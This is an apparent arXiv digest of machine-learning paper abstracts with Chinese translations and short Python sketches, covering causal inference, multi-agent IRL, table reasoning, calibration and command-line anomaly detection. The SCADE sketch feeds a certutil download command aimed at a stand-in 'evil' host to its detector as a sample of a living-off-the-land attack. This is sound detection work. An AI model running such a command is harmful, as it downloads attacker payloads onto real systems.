更新时间: 2024-12-05 16:12:25
领域: cs.CV,cs.AI
Deep Causal Inference for Point-referenced Spatial Data with Continuous Treatments
Causal reasoning is often challenging with spatial data, particularly when handling high-dimensional inputs. To address this, we propose a neural network (NN) based framework integrated with an approximate Gaussian process to manage spatial interference and unobserved confounding. Additionally, we adopt a generalized propensity-score-based approach to address partially observed outcomes when estimating causal effects with continuous treatments. We evaluate our framework using synthetic, semi-synthetic, and real-world data inferred from satellite imagery. Our results demonstrate that NN-based models significantly outperform linear spatial regression models in estimating causal effects. Furthermore, in real-world case studies, NN-based models offer more reasonable predictions of causal effects, facilitating decision-making in relevant applications.
Updated: 2024-12-05 16:06:23
标题: 基于连续处理的点参考空间数据的深度因果推断
摘要: 因果推理通常在处理空间数据时具有挑战性,特别是在处理高维输入时。为了解决这个问题,我们提出了一个基于神经网络(NN)的框架,结合近似高斯过程来管理空间干扰和未观察到的混淆因素。此外,我们采用了基于广义倾向得分的方法来处理部分观察到的结果,以估算连续处理的因果效应。我们使用合成、半合成和从卫星影像推断出的真实数据来评估我们的框架。我们的结果表明,基于NN的模型在估算因果效应方面显著优于线性空间回归模型。此外,在真实案例研究中,基于NN的模型提供了更合理的因果效应预测,有助于相关应用中的决策制定。
更新时间: 2024-12-05 16:06:23
领域: cs.LG,J.2
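A hedged sketch of the generalized-propensity-score ingredient mentioned above (a standard construction for continuous treatments, shown here with a simple Gaussian linear model rather than the paper's NN-plus-Gaussian-process framework):

import numpy as np
from sklearn.linear_model import LinearRegression

def generalized_propensity(X, t):
    # Model the continuous treatment t given covariates X as Gaussian and
    # evaluate its conditional density at the observed treatments.
    reg = LinearRegression().fit(X, t)
    resid = t - reg.predict(X)
    sigma2 = resid.var()
    return np.exp(-resid**2 / (2 * sigma2)) / np.sqrt(2 * np.pi * sigma2)

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 3))
t = X @ np.array([1.0, -0.5, 0.2]) + rng.normal(scale=0.5, size=200)
print(generalized_propensity(X, t)[:5])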
Facility Location Games with Scaling Effects
We take the classic facility location problem and consider a variation, in which each agent's individual cost function is equal to their distance from the facility multiplied by a scaling factor which is determined by the facility placement. In addition to the general class of continuous scaling functions, we also provide results for piecewise linear scaling functions which can effectively approximate or model the scaling of many real world scenarios. We focus on the objectives of total and maximum cost, describing the computation of the optimal solution. We then move to the approximate mechanism design setting, observing that the agents' preferences may no longer be single-peaked. Consequently, we characterize the conditions on scaling functions which ensure that agents have single-peaked preferences. Under these conditions, we find a characterization of continuous, strategyproof, and anonymous mechanisms, and compute the total and maximum cost approximation ratios achievable by these mechanisms.
Updated: 2024-12-05 16:05:48
标题: 具有规模效应的设施选址博弈
摘要: 我们考虑经典设施选址问题的一个变种,其中每个代理的个体成本函数等于其到设施的距离乘以一个由设施位置决定的缩放因子。除了一般的连续缩放函数类别外,我们还给出了分段线性缩放函数的结果,这类函数可以有效地近似或建模许多现实场景中的缩放效应。我们关注总成本和最大成本两个目标,并描述了最优解的计算。随后我们转向近似机制设计的设定,注意到代理的偏好可能不再是单峰的。因此,我们刻画了确保代理具有单峰偏好的缩放函数条件。在这些条件下,我们给出了连续、防策略操纵(strategyproof)且匿名的机制的刻画,并计算了这些机制可实现的总成本和最大成本近似比。
更新时间: 2024-12-05 16:05:48
领域: cs.GT,cs.AI,cs.MA,econ.TH
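In LaTeX, with our own notation (agent locations $x_i$, facility location $y$, distance $d$, scaling function $s$), the model and the two objectives read:

\[
c_i(y) = d(x_i, y)\, s(y), \qquad \min_y \sum_i c_i(y) \ \ \text{(total cost)}, \qquad \min_y \max_i c_i(y) \ \ \text{(maximum cost)}.
\]

A piecewise linear $s$ can, for example, model costs that grow as the facility moves toward a congested region.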
On Multi-Agent Inverse Reinforcement Learning
In multi-agent systems, the agent behavior is highly influenced by its utility function, as these utilities shape both individual goals as well as interactions with the other agents. Inverse Reinforcement Learning (IRL) is a well-established approach to inferring the utility function by observing an expert behavior within a given environment. In this paper, we extend the IRL framework to the multi-agent setting, assuming to observe agents who are following Nash Equilibrium (NE) policies. We theoretically investigate the set of utilities that explain the behavior of NE experts. Specifically, we provide an explicit characterization of the feasible reward set and analyze how errors in estimating the transition dynamics and expert behavior impact the recovered rewards. Building on these findings, we provide the first sample complexity analysis for the multi-agent IRL problem. Finally, we provide a numerical evaluation of our theoretical results.
Updated: 2024-12-05 16:04:02
标题: 关于多智能体逆强化学习的研究
摘要: 在多智能体系统中,智能体的行为受其效用函数的高度影响,因为这些效用函数塑造了个体目标以及与其他智能体的互动。逆强化学习(IRL)是一种已经建立的方法,通过观察给定环境中的专家行为来推断效用函数。在本文中,我们将IRL框架扩展到多智能体设置中,假设观察到的智能体遵循纳什均衡(NE)策略。我们在理论上研究了解释NE专家行为的效用集合。具体而言,我们提供了可行奖励集合的明确特征化,并分析了在估计转移动力学和专家行为时出现的误差对恢复奖励的影响。基于这些发现,我们提供了多智能体IRL问题的首个样本复杂性分析。最后,我们对我们的理论结果进行了数值评估。
更新时间: 2024-12-05 16:04:02
领域: cs.LG
Complexity of Vector-valued Prediction: From Linear Models to Stochastic Convex Optimization
We study the problem of learning vector-valued linear predictors: these are prediction rules parameterized by a matrix that maps an $m$-dimensional feature vector to a $k$-dimensional target. We focus on the fundamental case with a convex and Lipschitz loss function, and show several new theoretical results that shed light on the complexity of this problem and its connection to related learning models. First, we give a tight characterization of the sample complexity of Empirical Risk Minimization (ERM) in this setting, establishing that $\smash{\widetilde{\Omega}}(k/\epsilon^2)$ examples are necessary for ERM to reach $\epsilon$ excess (population) risk; this provides for an exponential improvement over recent results by Magen and Shamir (2023) in terms of the dependence on the target dimension $k$, and matches a classical upper bound due to Maurer (2016). Second, we present a black-box conversion from general $d$-dimensional Stochastic Convex Optimization (SCO) to vector-valued linear prediction, showing that any SCO problem can be embedded as a prediction problem with $k=\Theta(d)$ outputs. These results portray the setting of vector-valued linear prediction as bridging between two extensively studied yet disparate learning models: linear models (corresponds to $k=1$) and general $d$-dimensional SCO (with $k=\Theta(d)$).
Updated: 2024-12-05 15:56:54
标题: 向量值预测的复杂性:从线性模型到随机凸优化
摘要: 我们研究学习向量值线性预测器的问题:这些是由一个映射$m$维特征向量到$k$维目标的矩阵参数化的预测规则。我们专注于基本情况,即具有凸和Lipschitz损失函数的情况,并展示了几个新的理论结果,揭示了这个问题的复杂性以及与相关学习模型的联系。首先,我们对这种情况下经验风险最小化(ERM)的样本复杂度进行了严格的刻画,建立了ERM需要$\smash{\widetilde{\Omega}}(k/\epsilon^2)$个样本才能达到$\epsilon$的多余(总体)风险;这在与目标维度$k$的依赖性方面相较于Magen和Shamir (2023)最近的结果实现了指数级的改进,并与Maurer (2016)的经典上界相匹配。其次,我们提出了一个从一般$d$维随机凸优化(SCO)到向量值线性预测的黑盒转换,表明任何SCO问题都可以嵌入为具有$k=\Theta(d)$个输出的预测问题。这些结果描述了向量值线性预测的设置,作为连接两个广泛研究但不同的学习模型之间的桥梁:线性模型(对应于$k=1$)和一般$d$维SCO(其中$k=\Theta(d)$)。
更新时间: 2024-12-05 15:56:54
领域: cs.LG
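For quick reference, the setting can be summarized in LaTeX (notation ours): predictors $x \mapsto Wx$ with $W \in \mathbb{R}^{k \times m}$, a convex and Lipschitz loss $\ell$, and population risk

\[
L(W) = \mathbb{E}_{(x,y)}\big[\ell(Wx, y)\big],
\]

for which the paper establishes that ERM needs $\smash{\widetilde{\Theta}}(k/\epsilon^2)$ samples for $\epsilon$ excess risk: the $\smash{\widetilde{\Omega}}(k/\epsilon^2)$ lower bound matches Maurer's (2016) upper bound.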
Reinforcement Learning from Wild Animal Videos
We propose to learn legged robot locomotion skills by watching thousands of wild animal videos from the internet, such as those featured in nature documentaries. Indeed, such videos offer a rich and diverse collection of plausible motion examples, which could inform how robots should move. To achieve this, we introduce Reinforcement Learning from Wild Animal Videos (RLWAV), a method to ground these motions into physical robots. We first train a video classifier on a large-scale animal video dataset to recognize actions from RGB clips of animals in their natural habitats. We then train a multi-skill policy to control a robot in a physics simulator, using the classification score of a third-person camera capturing videos of the robot's movements as a reward for reinforcement learning. Finally, we directly transfer the learned policy to a real quadruped Solo. Remarkably, despite the extreme gap in both domain and embodiment between animals in the wild and robots, our approach enables the policy to learn diverse skills such as walking, jumping, and keeping still, without relying on reference trajectories nor skill-specific rewards.
Updated: 2024-12-05 15:55:23
标题: 基于野生动物视频的强化学习
摘要: 我们提议通过观看来自互联网的成千上万野生动物视频(如自然纪录片中的片段)来学习腿式机器人的运动技能。这些视频提供了丰富多样的合理运动示例,可以指导机器人应该如何移动。为了实现这一目标,我们引入了基于野生动物视频的强化学习(RLWAV)方法,将这些运动落实到实体机器人上。我们首先在一个大规模动物视频数据集上训练一个视频分类器,以识别自然栖息地中动物RGB视频片段中的动作。然后我们在物理模拟器中训练一个多技能策略来控制机器人,并将第三人称摄像头拍摄的机器人运动视频的分类得分作为强化学习的奖励。最后,我们将学到的策略直接迁移到真实的四足机器人Solo上。值得注意的是,尽管野外动物与机器人在领域和形体上存在极大差距,我们的方法使策略能够学习行走、跳跃和保持静止等多样技能,而无需依赖参考轨迹或针对特定技能的奖励。
更新时间: 2024-12-05 15:55:23
领域: cs.RO,cs.CV,cs.LG
PoTable: Programming Standardly on Table-based Reasoning Like a Human Analyst
Table-based reasoning has garnered substantial research interest, particularly in its integration with Large Language Model (LLM) which has revolutionized the general reasoning paradigm. Numerous LLM-based studies introduce symbolic tools (e.g., databases, Python) as assistants to extend human-like abilities in structured table understanding and complex arithmetic computations. However, these studies can be improved better in simulating human cognitive behavior when using symbolic tools, as they still suffer from limitations of non-standard logical splits and constrained operation pools. In this study, we propose PoTable as a novel table-based reasoning method that simulates a human tabular analyst, which integrates a Python interpreter as the real-time executor accompanied by an LLM-based operation planner and code generator. Specifically, PoTable follows a human-like logical stage split and extends the operation pool into an open-world space without any constraints. Through planning and executing in each distinct stage, PoTable standardly completes the entire reasoning process and produces superior reasoning results along with highly accurate, steply commented and completely executable programs. Accordingly, the effectiveness and explainability of PoTable are fully demonstrated. Extensive experiments over three evaluation datasets from two public benchmarks on two backbones show the outstanding performance of our approach. In particular, GPT-based PoTable achieves over 4% higher absolute accuracy than runner-ups on all evaluation datasets.
Updated: 2024-12-05 15:54:16
标题: PoTable:像人类分析师一样标准地在基于表格推理上编程
摘要: 基于表格的推理引起了相当大的研究兴趣,特别是其与大型语言模型(LLM)的结合,后者已经彻底改变了一般推理范式。许多基于LLM的研究引入符号工具(例如数据库、Python)作为助手,以扩展类人的结构化表格理解和复杂算术计算能力。然而,这些研究在使用符号工具模拟人类认知行为方面仍有提升空间,因为它们仍然受到非标准逻辑划分和受限操作池的限制。在本研究中,我们提出了PoTable,一种模拟人类表格分析师的新型基于表格的推理方法,它集成了一个作为实时执行器的Python解释器,并配有基于LLM的操作规划器和代码生成器。具体而言,PoTable遵循类人的逻辑阶段划分,并将操作池扩展到不受任何约束的开放世界空间。通过在每个不同阶段进行规划和执行,PoTable规范地完成整个推理过程,产生更优的推理结果,以及高度准确、带有逐步注释且完全可执行的程序。因此,PoTable的有效性和可解释性得到了充分展示。在来自两个公共基准的三个评估数据集和两种骨干模型上进行的大量实验显示了我们方法的出色性能。特别是,基于GPT的PoTable在所有评估数据集上的绝对准确率比次优方法高出4%以上。
更新时间: 2024-12-05 15:54:16
领域: cs.IR,cs.AI
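A minimal sketch of the plan-then-execute loop described above (the prompts, the stage names, and the `llm` callable are hypothetical stand-ins, not PoTable's actual interface): at each stage an LLM plans one operation, emits pandas code, and a real Python interpreter executes it on the live DataFrame.

import pandas as pd

def potable_answer(llm, df: pd.DataFrame, question: str,
                   stages=("filter", "compute", "answer")):
    env = {"df": df, "pd": pd}
    for stage in stages:
        plan = llm(f"Stage: {stage}. Question: {question}. "
                   f"Columns: {list(df.columns)}. Describe one table operation.")
        code = llm(f"Write one line of pandas updating `df` (or `result`) to do: {plan}")
        exec(code, env)            # real-time, step-by-step execution
    return env.get("result")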
CoSy: Evaluating Textual Explanations of Neurons
A crucial aspect of understanding the complex nature of Deep Neural Networks (DNNs) is the ability to explain learned concepts within their latent representations. While methods exist to connect neurons to human-understandable textual descriptions, evaluating the quality of these explanations is challenging due to the lack of a unified quantitative approach. We introduce CoSy (Concept Synthesis), a novel, architecture-agnostic framework for evaluating textual explanations of latent neurons. Given textual explanations, our proposed framework uses a generative model conditioned on textual input to create data points representing the explanations. By comparing the neuron's response to these generated data points and control data points, we can estimate the quality of the explanation. We validate our framework through sanity checks and benchmark various neuron description methods for Computer Vision tasks, revealing significant differences in quality.
Updated: 2024-12-05 15:48:24
标题: CoSy: 评估神经元的文本解释
摘要: 理解深度神经网络(DNNs)复杂性的一个关键方面,是能够解释其潜在表示中学习到的概念。虽然存在将神经元与人类可理解的文本描述联系起来的方法,但由于缺乏统一的定量方法,评估这些解释的质量具有挑战性。我们引入了CoSy(Concept Synthesis),这是一个新颖的、与架构无关的框架,用于评估潜在神经元的文本解释。在给定文本解释的情况下,我们提出的框架使用一个以文本输入为条件的生成模型来创建代表这些解释的数据点。通过比较神经元对这些生成数据点和对照数据点的响应,我们可以估计解释的质量。我们通过合理性检验(sanity checks)验证了我们的框架,并对计算机视觉任务中的多种神经元描述方法进行了基准测试,揭示了质量上的显著差异。
更新时间: 2024-12-05 15:48:24
领域: cs.LG,cs.AI,cs.CL
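A hedged sketch of the evaluation idea (the `generate` and `neuron_act` callables are placeholders for a text-conditioned generative model and a neuron-activation probe; the difference-of-means statistic is our simplification of the comparison):

import numpy as np

def cosy_score(neuron_act, generate, explanation, control_inputs, n=50):
    # Synthesize inputs matching the explanation, then compare the neuron's
    # mean activation on them against its activation on control inputs.
    synth = [generate(explanation) for _ in range(n)]
    a_syn = np.array([neuron_act(x) for x in synth])
    a_ctl = np.array([neuron_act(x) for x in control_inputs])
    return a_syn.mean() - a_ctl.mean()   # large gap = faithful explanation

rng = np.random.default_rng(0)
generate = lambda text: rng.normal(loc=1.0, size=8)   # stand-in generator
neuron_act = lambda x: float(x.sum())                 # stand-in neuron probe
controls = [rng.normal(size=8) for _ in range(50)]
print(cosy_score(neuron_act, generate, "striped pattern", controls))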
Finite-sample performance of the maximum likelihood estimator in logistic regression
Logistic regression is a classical model for describing the probabilistic dependence of binary responses to multivariate covariates. We consider the predictive performance of the maximum likelihood estimator (MLE) for logistic regression, assessed in terms of logistic risk. We consider two questions: first, that of the existence of the MLE (which occurs when the dataset is not linearly separated), and second that of its accuracy when it exists. These properties depend on both the dimension of covariates and on the signal strength. In the case of Gaussian covariates and a well-specified logistic model, we obtain sharp non-asymptotic guarantees for the existence and excess logistic risk of the MLE. We then generalize these results in two ways: first, to non-Gaussian covariates satisfying a certain two-dimensional margin condition, and second to the general case of statistical learning with a possibly misspecified logistic model. Finally, we consider the case of a Bernoulli design, where the behavior of the MLE is highly sensitive to the parameter direction.
Updated: 2024-12-05 15:46:44
标题: 逻辑回归中最大似然估计器的有限样本性能
摘要: 逻辑回归是描述二元响应与多元协变量之间概率依赖关系的经典模型。我们考虑逻辑回归最大似然估计(MLE)的预测性能,以逻辑风险作为评估标准。我们考虑两个问题:一是MLE的存在性(当数据集不能被线性分离时成立),二是其存在时的准确性。这些性质同时取决于协变量的维度和信号强度。在高斯协变量且逻辑模型设定正确的情况下,我们得到了MLE存在性和超额逻辑风险的精确(sharp)非渐近保证。然后我们从两个方向推广这些结果:一是推广到满足特定二维边际条件的非高斯协变量,二是推广到逻辑模型可能设定错误的一般统计学习情形。最后,我们考虑伯努利设计的情况,其中MLE的行为对参数方向高度敏感。
更新时间: 2024-12-05 15:46:44
领域: math.ST,cs.LG,stat.ML,stat.TH
SynFinTabs: A Dataset of Synthetic Financial Tables for Information and Table Extraction
Table extraction from document images is a challenging AI problem, and labelled data for many content domains is difficult to come by. Existing table extraction datasets often focus on scientific tables due to the vast amount of academic articles that are readily available, along with their source code. However, there are significant layout and typographical differences between tables found across scientific, financial, and other domains. Current datasets often lack the words, and their positions, contained within the tables, instead relying on unreliable OCR to extract these features for training modern machine learning models on natural language processing tasks. Therefore, there is a need for a more general method of obtaining labelled data. We present SynFinTabs, a large-scale, labelled dataset of synthetic financial tables. Our hope is that our method of generating these synthetic tables is transferable to other domains. To demonstrate the effectiveness of our dataset in training models to extract information from table images, we create FinTabQA, a layout large language model trained on an extractive question-answering task. We test our model using real-world financial tables and compare it to a state-of-the-art generative model and discuss the results. We make the dataset, model, and dataset generation code publicly available.
Updated: 2024-12-05 15:42:59
标题: SynFinTabs:用于信息和表格提取的合成财务表数据集
摘要: 从文档图像中提取表格是一个具有挑战性的人工智能问题,而且许多内容领域的标注数据很难获取。现有的表格提取数据集通常侧重于科学表格,因为大量学术文章及其源代码易于获取。然而,科学、金融和其他领域的表格在布局和排版上存在显著差异。当前数据集通常缺少表格中包含的单词及其位置,而是依赖不可靠的OCR来提取这些特征,用于训练现代机器学习模型完成自然语言处理任务。因此,需要一种更通用的获取标注数据的方法。我们提出了SynFinTabs,一个大规模、带标注的合成金融表格数据集。我们希望这种生成合成表格的方法能够迁移到其他领域。为了展示我们的数据集在训练模型从表格图像中提取信息方面的有效性,我们创建了FinTabQA,一个在抽取式问答任务上训练的布局大型语言模型。我们使用真实的金融表格测试我们的模型,将其与最先进的生成式模型进行比较并讨论结果。我们公开提供数据集、模型和数据集生成代码。
更新时间: 2024-12-05 15:42:59
领域: cs.LG
Enhancing Whole Slide Image Classification through Supervised Contrastive Domain Adaptation
Domain shift in the field of histopathological imaging is a common phenomenon due to the intra- and inter-hospital variability of staining and digitization protocols. The implementation of robust models, capable of creating generalized domains, represents a need to be solved. In this work, a new domain adaptation method to deal with the variability between histopathological images from multiple centers is presented. In particular, our method adds a training constraint to the supervised contrastive learning approach to achieve domain adaptation and improve inter-class separability. Experiments performed on domain adaptation and classification of whole-slide images of six skin cancer subtypes from two centers demonstrate the method's usefulness. The results reflect superior performance compared to not using domain adaptation after feature extraction or staining normalization.
Updated: 2024-12-05 15:39:54
标题: 通过监督对比域自适应提升全切片图像分类
摘要: 组织病理学成像领域中的域偏移是一种常见现象,源于染色和数字化协议在医院内部和医院之间的差异。构建能够形成泛化域的稳健模型是一个亟待解决的问题。本文提出了一种新的域自适应方法,用于处理来自多个中心的组织病理学图像之间的差异。具体而言,我们的方法在监督对比学习方法中加入一个训练约束,以实现域自适应并改善类间可分性。对来自两个中心的六种皮肤癌亚型的全切片图像进行的域自适应和分类实验表明了该方法的实用性。结果显示,与在特征提取或染色归一化之后不使用域自适应相比,该方法取得了更优越的性能。
更新时间: 2024-12-05 15:39:54
领域: cs.CV,cs.AI
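For context, a sketch of the supervised contrastive (SupCon) base loss the method extends is given below; the paper's additional domain-adaptation constraint is its own contribution and is not reproduced here.

import torch
import torch.nn.functional as F

def supcon_loss(z, labels, tau=0.1):
    # Supervised contrastive loss (Khosla et al. style): for each anchor,
    # pull same-label embeddings together against all other batch entries.
    z = F.normalize(z, dim=1)
    n = z.size(0)
    eye = torch.eye(n, dtype=torch.bool, device=z.device)
    sim = (z @ z.T / tau).masked_fill(eye, float("-inf"))   # drop self-pairs
    log_prob = sim - torch.logsumexp(sim, dim=1, keepdim=True)
    log_prob = log_prob.masked_fill(eye, 0.0)               # avoid 0 * (-inf)
    pos = ((labels[:, None] == labels[None, :]) & ~eye).float()
    return -(pos * log_prob).sum(1).div(pos.sum(1).clamp(min=1)).mean()

z = torch.randn(16, 128, requires_grad=True)
labels = torch.randint(0, 6, (16,))
loss = supcon_loss(z, labels)
loss.backward()
print(float(loss))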
SCADE: Scalable Command-line Anomaly Detection Engine
As command-line interfaces remain an integral part of high-computation environments, the risk of exploitation through stealthy, complex command-line abuse continues to grow. Conventional security solutions often struggle with these command-line-based anomalies due to their context-specific nature and lack of labeled data, especially in detecting rare, malicious patterns amidst legitimate, high-volume activity. This gap has left organizations vulnerable to sophisticated threats like Living-off-the-Land (LOL) attacks, where standard detection tools frequently miss or misclassify anomalous command-line behavior. We introduce the Scalable Command-line Anomaly Detection Engine (SCADE), which addresses these challenges by introducing a dual-layered detection framework that combines a global statistical analysis with local context-specific anomaly detection, innovatively using a novel ensemble of statistical models such as BM25 and Log Entropy, adapted for command-line data. The framework also features a dynamic thresholding mechanism for adaptive anomaly detection, ensuring high precision and recall even in environments with extremely high Signal-to-Noise Ratios (SNRs). Initial experimental results demonstrate the effectiveness of the framework, achieving above 98% SNR in identifying unusual command-line behavior while minimizing false positives. In this paper, we present SCADE's core architecture, including its metadata-enriched approach to anomaly detection and the design choices behind its scalability for enterprise-level deployment. We argue that SCADE represents a significant advancement in command-line anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.
Updated: 2024-12-05 15:39:13
标题: SCADE:可扩展的命令行异常检测引擎
摘要: 随着命令行界面仍然是高计算环境的重要组成部分,通过隐秘、复杂的命令行滥用进行利用的风险不断增加。传统的安全解决方案通常难以处理这些基于命令行的异常,因为它们具有特定于上下文的特性并且缺乏标注数据,尤其是在合法的高容量活动中检测罕见的恶意模式时。这种差距使组织容易受到诸如"Living-off-the-Land"(LOL)攻击之类的复杂威胁,在此类攻击中,标准检测工具经常漏报或错误分类异常的命令行行为。我们引入了可扩展的命令行异常检测引擎(SCADE),它通过一个结合全局统计分析和局部特定上下文异常检测的双层检测框架来应对这些挑战,并创新性地使用了针对命令行数据调整的新颖统计模型集成,如BM25和Log Entropy。该框架还具有用于自适应异常检测的动态阈值机制,确保即使在信噪比(SNR)极高的环境中也能获得高精确率和召回率。初步实验结果表明了该框架的有效性,在识别异常命令行行为时达到98%以上的SNR,同时最大限度地减少误报。在本文中,我们介绍了SCADE的核心架构,包括其基于元数据增强的异常检测方法,以及支撑其企业级部署可扩展性的设计选择。我们认为,SCADE代表了命令行异常检测的重大进步,为寻求在高计算环境中提高检测准确性的安全分析师和研究人员提供了一个稳健、自适应的框架。
更新时间: 2024-12-05 15:39:13
领域: cs.CR,cs.LG
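An illustrative sketch of the global statistical layer (not SCADE's actual code; the token-rarity score and the quantile rule are our simplifications of the BM25/Log-Entropy-style scoring and dynamic thresholding described above):

import math
from collections import Counter

def fit_token_stats(commands):
    # IDF-like rarity per token, estimated over the command corpus.
    docs = [set(c.split()) for c in commands]
    df = Counter(t for d in docs for t in d)
    n = len(docs)
    return {t: math.log(n / c) for t, c in df.items()}, math.log(n)

def score(cmd, rarity, unseen):
    toks = cmd.split()
    return sum(rarity.get(t, unseen) for t in toks) / max(len(toks), 1)

corpus = ["ls -la /tmp", "cat /etc/passwd", "ls -la /home"] * 100
rarity, unseen = fit_token_stats(corpus)
baseline = sorted(score(c, rarity, unseen) for c in corpus)
threshold = baseline[int(0.99 * len(baseline))]    # dynamic 99th percentile
print(score("certutil -urlcache -f http://evil/x x.exe", rarity, unseen) > threshold)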
Transient Multi-Agent Path Finding for Lifelong Navigation in Dense Environments
Multi-Agent Path Finding (MAPF) deals with finding conflict-free paths for a set of agents from an initial configuration to a given target configuration. The Lifelong MAPF (LMAPF) problem is a well-studied online version of MAPF in which an agent receives a new target when it reaches its current target. The common approach for solving LMAPF is to treat it as a sequence of MAPF problems, periodically replanning from the agents' current configurations to their current targets. A significant drawback in this approach is that in MAPF the agents must reach a configuration in which all agents are at their targets simultaneously, which is needlessly restrictive for LMAPF. Techniques have been proposed to indirectly mitigate this drawback. We describe cases where these mitigation techniques fail. As an alternative, we propose to solve LMAPF problems by solving a sequence of modified MAPF problems, in which the objective is for each agent to eventually visit its target, but not necessarily for all agents to do so simultaneously. We refer to this MAPF variant as Transient MAPF (TMAPF) and propose several algorithms for solving it based on existing MAPF algorithms. A limited experimental evaluation identifies some cases where using a TMAPF algorithm instead of a MAPF algorithm with an LMAPF framework can improve the system throughput significantly.
Updated: 2024-12-05 15:37:29
标题: 瞬态多智能体路径规划:面向密集环境中的终身导航
摘要: 多智能体路径规划(MAPF)涉及为一组智能体从初始配置到给定目标配置找到无冲突的路径。终身MAPF(LMAPF)问题是MAPF的一个经过深入研究的在线版本,在该版本中,当智能体到达当前目标时会接收一个新的目标。解决LMAPF的常见方法是将其视为一系列MAPF问题,周期性地重新规划从智能体的当前配置到其当前目标。这种方法的一个重要缺点是,在MAPF中,智能体必须达到一个配置,其中所有智能体同时到达其目标,这对LMAPF来说是不必要地限制性的。已经提出了一些技术来间接缓解这个缺点。我们描述了这些缓解技术失败的情况。作为一种替代方案,我们建议通过解决一系列修改后的MAPF问题来解决LMAPF问题,其中目标是让每个智能体最终访问其目标,但不一定要求所有智能体同时这样做。我们将这种MAPF变体称为瞬态MAPF(TMAPF),并提出了基于现有MAPF算法的几种解决方案。有限的实验评估确定了一些情况,即在LMAPF框架中使用TMAPF算法而不是MAPF算法可以显著提高系统吞吐量。
更新时间: 2024-12-05 15:37:29
领域: cs.MA,cs.AI,cs.RO
CLINICSUM: Utilizing Language Models for Generating Clinical Summaries from Patient-Doctor Conversations
This paper presents ClinicSum, a novel framework designed to automatically generate clinical summaries from patient-doctor conversations. It utilizes a two-module architecture: a retrieval-based filtering module that extracts Subjective, Objective, Assessment, and Plan (SOAP) information from conversation transcripts, and an inference module powered by fine-tuned Pre-trained Language Models (PLMs), which leverage the extracted SOAP data to generate abstracted clinical summaries. To fine-tune the PLM, we created a training dataset of consisting 1,473 conversations-summaries pair by consolidating two publicly available datasets, FigShare and MTS-Dialog, with ground truth summaries validated by Subject Matter Experts (SMEs). ClinicSum's effectiveness is evaluated through both automatic metrics (e.g., ROUGE, BERTScore) and expert human assessments. Results show that ClinicSum outperforms state-of-the-art PLMs, demonstrating superior precision, recall, and F-1 scores in automatic evaluations and receiving high preference from SMEs in human assessment, making it a robust solution for automated clinical summarization.
Updated: 2024-12-05 15:34:02
标题: ClinicSum:利用语言模型从医患对话生成临床摘要
摘要: 本文介绍了ClinicSum,一个旨在自动从医患对话中生成临床摘要的新颖框架。它采用两模块架构:一个基于检索的过滤模块,从对话转录中提取主观、客观、评估和计划(SOAP)信息;以及一个由微调后的预训练语言模型(PLMs)驱动的推理模块,利用提取的SOAP数据生成抽象式临床摘要。为了微调PLM,我们通过整合两个公开可用的数据集FigShare和MTS-Dialog,构建了一个包含1,473个对话-摘要对的训练数据集,其真实摘要经过主题专家(SMEs)验证。ClinicSum的有效性通过自动指标(如ROUGE、BERTScore)和专家人工评估两种方式进行评价。结果显示,ClinicSum优于最先进的PLMs,在自动评估中展现出更高的精确率、召回率和F-1分数,并在人工评估中获得SMEs的高度偏好,使其成为自动临床摘要生成的稳健解决方案。
更新时间: 2024-12-05 15:34:02
领域: cs.CL,cs.AI
Calib3D: Calibrating Model Preferences for Reliable 3D Scene Understanding
Safety-critical 3D scene understanding tasks necessitate not only accurate but also confident predictions from 3D perception models. This study introduces Calib3D, a pioneering effort to benchmark and scrutinize the reliability of 3D scene understanding models from an uncertainty estimation viewpoint. We comprehensively evaluate 28 state-of-the-art models across 10 diverse 3D datasets, uncovering insightful phenomena that cope with both the aleatoric and epistemic uncertainties in 3D scene understanding. We discover that despite achieving impressive levels of accuracy, existing models frequently fail to provide reliable uncertainty estimates -- a pitfall that critically undermines their applicability in safety-sensitive contexts. Through extensive analysis of key factors such as network capacity, LiDAR representations, rasterization resolutions, and 3D data augmentation techniques, we correlate these aspects directly with the model calibration efficacy. Furthermore, we introduce DeptS, a novel depth-aware scaling approach aimed at enhancing 3D model calibration. Extensive experiments across a wide range of configurations validate the superiority of our method. We hope this work could serve as a cornerstone for fostering reliable 3D scene understanding. Code and benchmark toolkit are publicly available.
Updated: 2024-12-05 15:33:29
标题: Calib3D:校准模型偏好以实现可靠的3D场景理解
摘要: 安全关键的三维场景理解任务不仅需要三维感知模型给出准确的预测,还需要其给出置信度可靠的预测。本研究介绍了Calib3D,这是一项从不确定性估计角度对三维场景理解模型可靠性进行基准测试和审查的开创性工作。我们在10个不同的三维数据集上全面评估了28个最先进的模型,揭示了与三维场景理解中的偶然(aleatoric)不确定性和认知(epistemic)不确定性相关的有见地的现象。我们发现,尽管现有模型达到了令人印象深刻的准确性水平,但它们经常无法提供可靠的不确定性估计,这一缺陷严重削弱了它们在安全敏感场景中的适用性。通过对网络容量、LiDAR表示、光栅化分辨率和三维数据增强技术等关键因素的广泛分析,我们将这些方面与模型校准效果直接关联起来。此外,我们引入了DeptS,一种旨在增强三维模型校准的新型深度感知缩放方法。在广泛配置下进行的大量实验验证了我们方法的优越性。我们希望这项工作能够成为促进可靠三维场景理解的基石。代码和基准工具包均已公开。
更新时间: 2024-12-05 15:33:29
领域: cs.CV,cs.LG,cs.RO
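As background, the standard calibration metric such benchmarks rest on can be sketched as follows (the binning scheme is our own choice; Calib3D's exact protocol may differ):

import numpy as np

def ece(conf, correct, n_bins=15):
    # Expected calibration error: average |accuracy - confidence| over bins,
    # weighted by bin occupancy.
    bins = np.linspace(0.0, 1.0, n_bins + 1)
    total, err = len(conf), 0.0
    for lo, hi in zip(bins[:-1], bins[1:]):
        m = (conf > lo) & (conf <= hi)
        if m.any():
            err += (m.sum() / total) * abs(correct[m].mean() - conf[m].mean())
    return err

rng = np.random.default_rng(0)
conf = rng.uniform(0.5, 1.0, size=1000)
correct = (rng.uniform(size=1000) < conf).astype(float)  # calibrated by design
print(ece(conf, correct))                                # close to 0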
Bayesian evidence estimation from posterior samples with normalizing flows
